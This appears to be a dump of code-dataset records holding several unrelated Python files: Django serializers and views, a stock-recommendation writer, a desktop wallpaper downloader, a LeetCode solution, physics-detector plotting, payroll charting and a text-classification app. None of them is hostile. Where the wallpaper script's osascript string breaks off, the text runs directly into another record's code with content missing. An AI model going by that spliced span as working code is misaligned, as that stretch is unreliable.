"friendship.models.Friend.objects.add_friend", "line_number": 29, "usage_type": "call"}, {"api_name": "friendship.models.Friend.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "friendship.models.Friend", "line_number": 29, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 35, "usage_type": "name"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 37, "usage_type": "call"}, {"api_name": "friendship.models.Friend", "line_number": 39, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 45, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 46, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 46, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 46, "usage_type": "name"}, {"api_name": "friendship.models.Friend.objects.remove_friend", "line_number": 47, "usage_type": "call"}, {"api_name": "friendship.models.Friend.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "friendship.models.Friend", "line_number": 47, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 53, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 53, "usage_type": "name"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 54, "usage_type": "call"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 56, "usage_type": "name"}, {"api_name": "friendship.models.FriendshipRequest.objects.get", "line_number": 61, "usage_type": "call"}, {"api_name": "friendship.models.FriendshipRequest.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 65, "usage_type": "attribute"}, {"api_name": "rest_framework.serializers", "line_number": 65, "usage_type": "name"}, {"api_name": "rest_framework.fields.IntegerField", "line_number": 66, "usage_type": "call"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 68, "usage_type": "name"}, {"api_name": "friendship.models.FriendshipRequest.objects.get", "line_number": 73, "usage_type": "call"}, {"api_name": "friendship.models.FriendshipRequest.objects", "line_number": 73, "usage_type": "attribute"}, {"api_name": "friendship.models.FriendshipRequest", "line_number": 73, "usage_type": "name"}]} {"seq_id": "354773872", "text": "\nfrom aganlab.databases import connect_strs, getDatabaseAPIs\n\nfrom aganlab.databases.local_nlp import Doc2VecModelReference\nfrom aganlab.databases.remote_stock import RecoCom\n\nfrom aganlab.sim_stocks.testing import most_similar, usable_stock\n\nimport datetime\n\nimport logging\nlogger = logging.getLogger(__name__)\n\ndef redirector(result):\n container = { 'all': [], 'A股': [], '三板股':[] }\n for code, _, _, market, _ in result:\n container['all'].append(code)\n container[market].append(code)\n for index, ls in container.items():\n container[index] = ','.join(ls)\n reco_all = container['all']\n reco_ashare = container['A股']\n reco_oc = container['三板股']\n return reco_all, reco_ashare, reco_oc\n\ndef __main__(doc2vec_id):\n _, _, sess_scope_local_nlp = getDatabaseAPIs(connect_strs['local_nlp'])\n _, _, sess_scope_remote_a = getDatabaseAPIs(connect_strs['remote_a_shares'])\n _, _, sess_scope_stock = getDatabaseAPIs(connect_strs['remote_stock'])\n\n with sess_scope_local_nlp() as sess_local_nlp, sess_scope_remote_a() as sess_remote_a, sess_scope_stock() as sess_stock:\n doc2vec = sess_local_nlp.query(Doc2VecModelReference).filter_by(id_=doc2vec_id).first().load_model()\n # all_codes = [\n # code for code in doc2vec.docvecs.doctags.keys()\n # if code not in existed\n # ]\n all_codes = doc2vec.docvecs.doctags.keys()\n for code in all_codes:\n result = most_similar(sess_remote_a, sess_local_nlp, doc2vec, code, fast_mode=True)\n reco_all, reco_ashare, reco_oc = redirector(result)\n reco_com = RecoCom(\n code = code,\n reco_codes_all = reco_all,\n reco_codes_neeq = reco_oc,\n reco_codes_astock = reco_ashare,\n update_time = datetime.datetime.now()\n )\n\n sess_stock.merge(reco_com)\n sess_stock.commit()\n", "sub_path": "sim_stocks/writing.py", "file_name": "writing.py", "file_ext": "py", "file_size_in_byte": 1947, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "aganlab.databases.getDatabaseAPIs", "line_number": 27, "usage_type": "call"}, {"api_name": "aganlab.databases.connect_strs", "line_number": 27, "usage_type": "name"}, {"api_name": "aganlab.databases.getDatabaseAPIs", "line_number": 28, "usage_type": "call"}, {"api_name": "aganlab.databases.connect_strs", "line_number": 28, "usage_type": "name"}, {"api_name": "aganlab.databases.getDatabaseAPIs", "line_number": 29, "usage_type": "call"}, {"api_name": "aganlab.databases.connect_strs", "line_number": 29, "usage_type": "name"}, {"api_name": "aganlab.databases.local_nlp.Doc2VecModelReference", "line_number": 32, "usage_type": "argument"}, {"api_name": "aganlab.sim_stocks.testing.most_similar", "line_number": 39, "usage_type": "call"}, {"api_name": "aganlab.databases.remote_stock.RecoCom", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 46, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 46, "usage_type": "attribute"}]} {"seq_id": "112043862", "text": "import ConfigParser\nimport hashlib\nimport json\nimport os\nif os.name == \"nt\":\n import ctypes\nimport subprocess\nimport sys\nimport urllib\n\ndef ensureDirExists(path):\n if not os.path.exists(path) and not os.path.isdir(path):\n os.mkdir(path)\n elif not os.path.isdir(path):\n raise IOError(\"Path exists and is not a directory: %s\" % path)\n\nbaseDir = os.path.join(\n os.path.expanduser(\"~\"),\n \".groundbreaker\"\n )\nensureDirExists(baseDir)\nensureDirExists(os.path.join(baseDir, \"lists\"))\n\nconfig = ConfigParser.SafeConfigParser()\nconfig.read(os.path.join(baseDir, \"config.ini\"))\n\napiMount = config.get(\"Ablaze:api\", \"mount\")\ntags = config.get(\"Ablaze:api\", \"filter\")\ntags = \" \".join(tags.split(\"\\n\")).strip()\n\napiHandle = urllib.urlopen(\"http://ablaze.web/api/media/random?\"+urllib.urlencode({\"q\":tags}))\nresult = apiHandle.read()\n\ndata = json.loads(result)\nif data['code'] is not 200:\n sys.exit()\n\n\nif config.get(\"Groundbreaker\", \"retrieve_strategy\") == \"link\":\n localURI = os.path.join(config.get(\"Groundbreaker\", \"link_base\"), data['result']['hash_sha1']+\".\"+data['result']['file_type'])\nelse: # config.get(\"Groundbreaker\", \"retrieve_strategy\") == \"cache\": \n localURI = os.path.join(baseDir, \"cache\", data['result']['hash_sha1']+\".\"+data['result']['file_type'])\n if not os.path.exists(localURI):\n urlHandle = urllib.urlopen(data['result']['url'])\n fileData = urlHandle.read()\n sha1 = hashlib.sha1(fileData).hexdigest()\n if sha1 != data['result']['hash_sha1']:\n raise Expression(\"Hash mismatch\")\n with open(localURI, \"wb+\", 0) as handle:\n handle.write(fileData)\n\n\n\nqueryHash = hashlib.sha1(tags).hexdigest()\nimgListPath = os.path.join(baseDir, \"lists\", queryHash)\nensureDirExists(imgListPath)\nlinkPath = os.path.join(imgListPath, data['result']['hash_sha1']+\".\"+data['result']['file_type'])\nif not os.path.exists(linkPath):\n if os.name == \"nt\":\n ctypes.windll.kernel32.CreateHardLinkW(linkPath, localURI, 0)\n else:\n os.symlink(localURI, linkPath)\n\n\nwith open(os.path.join(baseDir, \"postid\"), \"w+\") as handle:\n handle.write(\"%i\" % data['result']['id'])\n\nwith open(os.path.join(baseDir, \"sha1\"), \"w+\") as handle:\n handle.write(data['result']['hash_sha1'])\n\nif os.name == \"nt\":\n from PIL import Image\n bmpImage = Image.open(localURI)\n newPath = os.path.join(baseDir, \"bg.bmp\")\n bmpImage.save(newPath, \"BMP\")\n ctypes.windll.user32.SystemParametersInfoA(20, 0, newPath, 0)\nelif os.uname()[0].lower() == \"linux\":\n subprocess.call([\"gsettings\",\"set\",\"org.gnome.desktop.background\",\"picture-uri\",\"file://\"+localURI])\nelif os.uname()[0].lower() == \"darwin\":\n SCRIPT = \"\"\"/usr/bin/osascript< List[List[str]]:\n \"\"\"\n Given an array of strings `products` and a string `searchWord`. We want to design a system that suggests at most three product names from `products` after each character of `searchWord` is typed. Suggested products should have common prefix with the searchWord. If there are more than three products with a common prefix return the three lexicographically minimums products.\n\n Return *list of lists* of the suggested `products` after each character of `searchWord` is typed.\n\n\n **Example 1:**\n\n ```\n Input: products = [\"mobile\",\"mouse\",\"moneypot\",\"monitor\",\"mousepad\"], searchWord = \"mouse\"\n Output: [\n [\"mobile\",\"moneypot\",\"monitor\"],\n [\"mobile\",\"moneypot\",\"monitor\"],\n [\"mouse\",\"mousepad\"],\n [\"mouse\",\"mousepad\"],\n [\"mouse\",\"mousepad\"]\n ]\n Explanation: products sorted lexicographically = [\"mobile\",\"moneypot\",\"monitor\",\"mouse\",\"mousepad\"]\n After typing m and mo all products match and we show user [\"mobile\",\"moneypot\",\"monitor\"]\n After typing mou, mous and mouse the system suggests [\"mouse\",\"mousepad\"]\n ```\n\n **Example 2:**\n\n ```\n Input: products = [\"havana\"], searchWord = \"havana\"\n Output: [[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"],[\"havana\"]]\n ```\n\n **Example 3:**\n\n ```\n Input: products = [\"bags\",\"baggage\",\"banner\",\"box\",\"cloths\"], searchWord = \"bags\"\n Output: [[\"baggage\",\"bags\",\"banner\"],[\"baggage\",\"bags\",\"banner\"],[\"baggage\",\"bags\"],[\"bags\"]]\n ```\n\n **Example 4:**\n\n ```\n Input: products = [\"havana\"], searchWord = \"tatiana\"\n Output: [[],[],[],[],[],[],[]]\n ```\n\n\n\n **Constraints:**\n\n - `1 <= products.length <= 1000`\n - There are no repeated elements in `products`.\n - `1 <= Σ products[i].length <= 2 * 10^4`\n - All characters of `products[i]` are lower-case English letters.\n - `1 <= searchWord.length <= 1000`\n - All characters of `searchWord` are lower-case English letters.\n\n\n Parameters\n ----------\n products: List[str]\n searchWord: str\n\n Returns\n -------\n int\n\n Examples\n --------\n\n Notes\n -----\n\n References\n ---------\n\n \"\"\"\n from bisect import bisect_left\n i, res, prefix = 0, [], ''\n products.sort()\n for ch in searchWord:\n prefix = prefix + ch\n i = bisect_left(products, prefix, i)\n res.append([w for w in products[i:i+3] if w.startswith(prefix)])\n return res\n\n def suggestedProducts01(self, products: List[str], searchWord: str) -> List[List[str]]:\n from collections import defaultdict\n\n class Trie:\n def __init__(self):\n self.sub = defaultdict(Trie)\n self.suggestions = []\n\n def add_suggestions(self, word):\n if len(self.suggestions) < 3:\n self.suggestions.append(word)\n\n products = sorted(products)\n root = Trie()\n for word in products:\n node = root\n for ch in word:\n node = node.sub[ch]\n node.add_suggestions(word)\n\n res, node = [], root\n for ch in searchWord:\n node = node.sub[ch]\n res.append(node.suggestions)\n\n return res\n\n\n\n", "sub_path": "01268/search_suggestions_system.py", "file_name": "search_suggestions_system.py", "file_ext": "py", "file_size_in_byte": 3569, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}, {"api_name": "bisect.bisect_left", "line_number": 85, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 89, "usage_type": "name"}]} {"seq_id": "58193997", "text": "#工具准备\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\nimport tensorflow as tf\r\nfrom sklearn.preprocessing import scale\r\nimport numpy as np\r\n\r\n#函数准备\r\ndef model(w, x, b):\r\n return x @ w + b\r\n\r\ndef loss(x, y, w, b):\r\n err = y - model(w, x, b)\r\n return tf.reduce_mean(tf.square(err))\r\n\r\ndef gard(x, y, w, b):\r\n with tf.GradientTape() as tape:\r\n loss_ = loss(x, y, w, b)\r\n return tape.gradient(loss_, [w, b])\r\n\r\n#数据准备\r\nbuston = tf.keras.datasets.boston_housing\r\n(x_train, y_train), (x_test, y_test) = buston.load_data()\r\nx_train, x_test = tf.cast(scale(x_train), tf.float32), tf.cast(scale(x_test), tf.float32)\r\n\r\n#模型准备\r\nw = tf.Variable(tf.random.normal([13, 1], mean=0, stddev=1.), dtype=tf.float32)\r\nb = tf.Variable(tf.zeros(1), dtype=tf.float32)\r\ntrain_epochs = 50\r\nlearning_rate = 0.001\r\nbatch_size = 10\r\noptimizer = tf.keras.optimizers.SGD(learning_rate)\r\n\r\n#模型训练\r\nfor epoch in range(train_epochs):\r\n for step in range(int(len(x_train) / batch_size)):\r\n xs = x_train[step * batch_size:(step + 1) * batch_size]\r\n ys = y_train[step * batch_size:(step + 1) * batch_size]\r\n\r\n gards = gard(xs, ys, w, b)\r\n optimizer.apply_gradients(zip(gards, [w, b]))\r\n\r\n train_loss = loss(x_train, y_train, w, b) # 当前轮次总的损失\r\n print(\"epoch:{:3d},train_loss:{:.4f}\".format(epoch, train_loss))\r\n#训练结果\r\nprint('w:',w.numpy().transpose(), '\\nb:', b.numpy())\r\nnp.random.seed(int(np.random.rand()*1000))\r\nhouse_id = np.random.randint(0, len(x_test))\r\nprint('testNum',len(x_test))\r\npre = model(w, x_test, b)[house_id]\r\nprint(\"第{}条数据,预测值:{:.4f},实际值:{}\".format(house_id, pre[0], y_test[house_id]))", "sub_path": "第七周作业/boston.py", "file_name": "boston.py", "file_ext": "py", "file_size_in_byte": 1734, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 17, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.scale", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random.normal", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.SGD", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}]} {"seq_id": "580071156", "text": "# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render, redirect\n\n\n\n# Importamos una clase\nfrom django.http import HttpResponse\n\nfrom django.core.urlresolvers import reverse_lazy\n\nfrom django.views.generic import ListView, CreateView, UpdateView, DeleteView\n\n# Importamos el formulario que creamos\nfrom app.mascota.form import MascotaForm \n\n# Importamos el modelo\nfrom app.mascota.models import Mascota\n\n# Create your views here.\ndef index(request):\n\treturn render(request, 'mascota/index.html')\n\n\n# Creamos una vista (esta es basada en función)\ndef mascota_view(request):\n\t# Si el request es un POST\n\tif request.method == 'POST':\n\t\t# se va a recibir los datos que estan mandando en el post de nuestro formulario\n\t\tform = MascotaForm(request.POST)\n\t\t# consultados si los datos mandados son válidos se guardan esos datos\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t# si pasa vamos a redirigir con el shortcut redirect (hay que importarlos) a una url usamos el espacio de nombre que ya habíamos definido\n\t\treturn redirect('mascota:index')\n\telse:\n\t\t# si no es post no volvemos al formulario\n\t\tform = MascotaForm()\n\t# Por último mandamos la respuesta que es un request (sin olvidar de pasar el contexto en un diccionario)\n\treturn render (request, 'mascota/mascota_form.html', {'form':form})\n\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\t\t\t\t\t# VISTAS BASADAS EN CLASE (importante importar las views.generic)\n#----------------------------------------------------------------------------------------\n#----------------------------------------------------------------------------------------\n\n# Vista para Listar Registros\n\nclass MascotaList(ListView):\n\t# indicamos cual es el modelo\n\tmodel = Mascota \n\t# indicamos a que template enviamos el contexto\n\ttemplate_name = 'mascota/mascota_list.html'\n\n# Vista para Crear Registros\n\nclass MascotaCreate(CreateView):\n\tmodel = Mascota\n\tform_class = MascotaForm\n\ttemplate_name = 'mascota/mascota_form.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\t\n# Vista para actualizar\nclass MascotaUpdate(UpdateView):\n\tmodel = Mascota\n\tform_class = MascotaForm\n\ttemplate_name = 'mascota/mascota_form.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\n# Vista para eliminar\nclass MascotaDelete(DeleteView):\n\tmodel = Mascota\n\ttemplate_name = 'mascota/mascota_delete.html'\n\tsuccess_url = reverse_lazy('mascota:mascota_listar')\n\n\n\n", "sub_path": "refugio/app/mascota/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2512, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "app.mascota.form.MascotaForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 35, "usage_type": "call"}, {"api_name": "app.mascota.form.MascotaForm", "line_number": 38, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "django.views.generic.ListView", "line_number": 50, "usage_type": "name"}, {"api_name": "app.mascota.models.Mascota", "line_number": 52, "usage_type": "name"}, {"api_name": "django.views.generic.CreateView", "line_number": 58, "usage_type": "name"}, {"api_name": "app.mascota.models.Mascota", "line_number": 59, "usage_type": "name"}, {"api_name": "app.mascota.form.MascotaForm", "line_number": 60, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse_lazy", "line_number": 62, "usage_type": "call"}, {"api_name": "django.views.generic.UpdateView", "line_number": 65, "usage_type": "name"}, {"api_name": "app.mascota.models.Mascota", "line_number": 66, "usage_type": "name"}, {"api_name": "app.mascota.form.MascotaForm", "line_number": 67, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse_lazy", "line_number": 69, "usage_type": "call"}, {"api_name": "django.views.generic.DeleteView", "line_number": 72, "usage_type": "name"}, {"api_name": "app.mascota.models.Mascota", "line_number": 73, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse_lazy", "line_number": 75, "usage_type": "call"}]} {"seq_id": "59183828", "text": "#!/usr/bin/env python3\n\nfrom scipp import array, DataArray, ones_like\nfrom argparse import ArgumentParser\nimport h5py, os\nimport matplotlib.pyplot as plt\n\n#nspertick = 11.356860963629653 # ESS clock is 88052500 Hz\n\n# Convert Ring and FEN to numbers or if not set, to 'A'\ndef id2chr(id):\n if id == -1:\n return 'any'\n else:\n return f'{id:02}'\n\ndef readtoscipp(filename):\n\n f = h5py.File(filename, 'r')\n dat = f['loki_readouts']\n\n #time = dat['EventTimeHigh'].astype('int')+dat['EventTimeLow'].astype('int')*nspertick/1000000000\n #time = array(values=time, dims=['event'], unit='sec')\n\n tube = array(values=dat['TubeId'].astype('int'), dims=['event'])\n ring = array(values=dat['RingId'].astype('int'), dims=['event'])\n fen = array(values=dat['FENId'].astype('int'), dims=['event'])\n\n ampl_a = array(values=1.0 * dat['AmpA'].astype('int'), dims=['event'], unit='mV')\n ampl_b = array(values=1.0 * dat['AmpB'].astype('int'), dims=['event'], unit='mV')\n ampl_c = array(values=1.0 * dat['AmpC'].astype('int'), dims=['event'], unit='mV')\n ampl_d = array(values=1.0 * dat['AmpD'].astype('int'), dims=['event'], unit='mV')\n\n events = ones_like(1. * tube)\n events.unit = 'counts'\n\n pos = (ampl_a + ampl_b) / (ampl_a + ampl_b + ampl_c + ampl_d)\n straw = (ampl_b + ampl_d) / (ampl_a + ampl_b + ampl_c + ampl_d)\n\n return DataArray(data=events,\n coords={'pos': pos, 'straw': straw, # 'time': time,\n 'tube': tube, 'ring': ring, 'fen': fen,\n 'amplitude_a': ampl_a, 'amplitude_b': ampl_b,\n 'amplitude_c': ampl_c, 'amplitude_d': ampl_d})\n\n\ndef load_and_save(args):\n dat = readtoscipp(args.filename)\n\n rgrp = array(dims=['ring'], values=[args.ring])\n fgrp = array(dims=['fen'], values=[args.fen])\n\n fig, ax = plt.subplots(4,2, figsize=(16,16))\n #fig.tight_layout()\n\n for i in range(args.tubes):\n print(f'processing ring {id2chr(args.ring)}, fen {id2chr(args.fen)}, tube {i}')\n tgrp = array(dims=['tube'], values=[i])\n if args.ring == -1 and args.fen == -1:\n grp = dat.group(tgrp).bins.concat()\n elif args.ring == -1 and args.fen != -1:\n grp = dat.group(fgrp, tgrp).bins.concat()\n elif args.ring != -1 and args.fen == -1:\n grp = dat.group(rgrp, tgrp).bins.concat()\n else:\n grp = dat.group(rgrp, fgrp, tgrp).bins.concat()\n\n yi = i // 2\n xi = i % 2\n cax = ax[yi, xi]\n grp.hist(pos=args.bin, straw=args.bin).plot(aspect=1.,norm='log', ax=cax)\n cax.title.set_text(f'Tube {i}')\n cax.set_xlim(args.xmin, args.xmax)\n cax.set_ylim(args.ymin, args.ymax)\n cax.yaxis.tick_left()\n cax.yaxis.set_label_position('left')\n if i <= 5:\n cax.set(xlabel='', ylabel='pos')\n else:\n cax.set(xlabel='straw', ylabel='pos')\n\n plt.suptitle(f'Ring: {id2chr(args.ring)}, FEN: {id2chr(args.fen)}, Tubes 0 - 8', size='28')\n plt.savefig(os.path.join(args.outdir, f'strawpos_{id2chr(args.ring)}_{id2chr(args.fen)}.png'))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(prog='dattoplot', description=__doc__)\n parser.add_argument('filename', type=str, nargs='?', default=\"\",\n help='.h5 file to load and plot')\n parser.add_argument('-o','--outdir', type=str, default=\"\",\n help='output directory')\n parser.add_argument('-r','--ring', type=int, default=-1, help='Ring Id (default all rings)')\n parser.add_argument('-f','--fen', type=int, default=-1, help='FEN Id (default all fens)')\n parser.add_argument('-t','--tubes', type=int, default=8, help='number of tubes')\n parser.add_argument('--xmin', type=float, default=0.0, help='min x-value')\n parser.add_argument('--xmax', type=float, default=1.0, help='max x-value')\n parser.add_argument('--ymin', type=float, default=0.0, help='min y-value')\n parser.add_argument('--ymax', type=float, default=1.0, help='max y-value')\n parser.add_argument('-b', '--bin', type=int, default=200, help='histogram bin size')\n\n args = parser.parse_args()\n\n load_and_save(args)\n", "sub_path": "detectors/loki/h5tools/strawpos.py", "file_name": "strawpos.py", "file_ext": "py", "file_size_in_byte": 4186, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "h5py.File", "line_number": 19, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 25, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 26, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 27, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 29, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 30, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 31, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 32, "usage_type": "call"}, {"api_name": "scipp.ones_like", "line_number": 34, "usage_type": "call"}, {"api_name": "scipp.DataArray", "line_number": 40, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 50, "usage_type": "call"}, {"api_name": "scipp.array", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "scipp.array", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 87, "usage_type": "call"}]} {"seq_id": "316742786", "text": "import matplotlib.pyplot as plt\nimport pandas as pd\nfrom matplotlib import gridspec\nimport matplotlib.ticker as mtick\n\n\ndef grids():\n \"\"\"Applies aesthetic gridding to a subplot axis.\"\"\"\n\n ax.minorticks_on()\n ax.tick_params('y', length=8, which='major', labelsize='10')\n ax.tick_params('y', length=3, which='minor')\n ax.tick_params('x', which='both', bottom=False, top=False)\n ax.set_axisbelow(True)\n ax.grid(True, which='major', ls='-', lw=.5, alpha=0.75, zorder=0, color='lightgray')\n ax.grid(True, which='minor', ls=':', alpha=.15, zorder=0, color='lightgray')\n\n\ndef spines():\n for spine in ax.spines.values():\n spine.set_visible(False)\n\n\ndef ticks():\n ax.tick_params(which='both', top=False, left=False, right=False, bottom=False)\n\n\ndef set_gridspec(widths, heights, wspace=0, hspace=0):\n fig = plt.figure(figsize=(sum(widths) + wspace * (len(widths) - 1),\n sum(heights) + hspace * (len(heights) - 1)))\n gs = gridspec.GridSpec(len(heights), len(widths),\n height_ratios=heights, width_ratios=widths)\n return fig, gs\n\n\ndef getPayrollData(year, job_title):\n df = pd.read_csv(f\"payroll data/santa-cruz-{year}.csv\")\n df_stats = df.loc[df['Job Title'].str.lower()==job_title.lower()].describe()\n return df_stats\n\npayroll_years = range(2011, 2019)\npayroll_data = {year: getPayrollData(year, 'Police Officer') for year in payroll_years}\n\n\n# Initializing figure.\nfig, gs = set_gridspec(widths=[15], heights=[7, 1, 7])\n\n# First figure\nax = fig.add_subplot(gs[0])\ngrids(); spines()\nax.set_facecolor('ghostwhite')", "sub_path": "police_payroll.py", "file_name": "police_payroll.py", "file_ext": "py", "file_size_in_byte": 1614, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.gridspec.GridSpec", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.gridspec", "line_number": 31, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}]} {"seq_id": "409076802", "text": "import pickle\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import punkt\nfrom nltk.corpus.reader import wordnet\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport requests\nfrom bs4 import BeautifulSoup\nimport numpy as np\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_table\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objs as go\n\npath_models = \"./04. Model Training/Models/\"\n\n# SVM\npath_svm = path_models + 'best_svc.pickle'\nwith open(path_svm, 'rb') as data:\n svc_model = pickle.load(data)\n\npath_tfidf = \"./03. Feature Engineering/Pickles/tfidf.pickle\"\n\nwith open(path_tfidf, 'rb') as data:\n tfidf = pickle.load(data)\n\ncategory_codes = {\n 'business': 0,\n 'entertainment': 1,\n 'politics': 2,\n 'sport': 3,\n 'tech': 4,\n 'other':5\n}\n\npunctuation_signs = list(\"?:!.,;\")\nstop_words = list(stopwords.words('english'))\n\ndef create_features_from_df(df):\n \n df['Content_Parsed_1'] = df['Content'].str.replace(\"\\r\", \" \")\n df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(\"\\n\", \" \")\n df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace(\" \", \" \")\n df['Content_Parsed_1'] = df['Content_Parsed_1'].str.replace('\"', '')\n \n df['Content_Parsed_2'] = df['Content_Parsed_1'].str.lower()\n \n df['Content_Parsed_3'] = df['Content_Parsed_2']\n for punct_sign in punctuation_signs:\n df['Content_Parsed_3'] = df['Content_Parsed_3'].str.replace(punct_sign, '')\n \n df['Content_Parsed_4'] = df['Content_Parsed_3'].str.replace(\"'s\", \"\")\n \n wordnet_lemmatizer = WordNetLemmatizer()\n nrows = len(df)\n lemmatized_text_list = []\n for row in range(0, nrows):\n\n # Create an empty list containing lemmatized words\n lemmatized_list = []\n # Save the text and its words into an object\n text = df.loc[row]['Content_Parsed_4']\n text_words = text.split(\" \")\n # Iterate through every word to lemmatize\n for word in text_words:\n lemmatized_list.append(wordnet_lemmatizer.lemmatize(word, pos=\"v\"))\n # Join the list\n lemmatized_text = \" \".join(lemmatized_list)\n # Append to the list containing the texts\n lemmatized_text_list.append(lemmatized_text)\n \n df['Content_Parsed_5'] = lemmatized_text_list\n \n df['Content_Parsed_6'] = df['Content_Parsed_5']\n for stop_word in stop_words:\n regex_stopword = r\"\\b\" + stop_word + r\"\\b\"\n df['Content_Parsed_6'] = df['Content_Parsed_6'].str.replace(regex_stopword, '')\n \n # TF-IDF\n features = 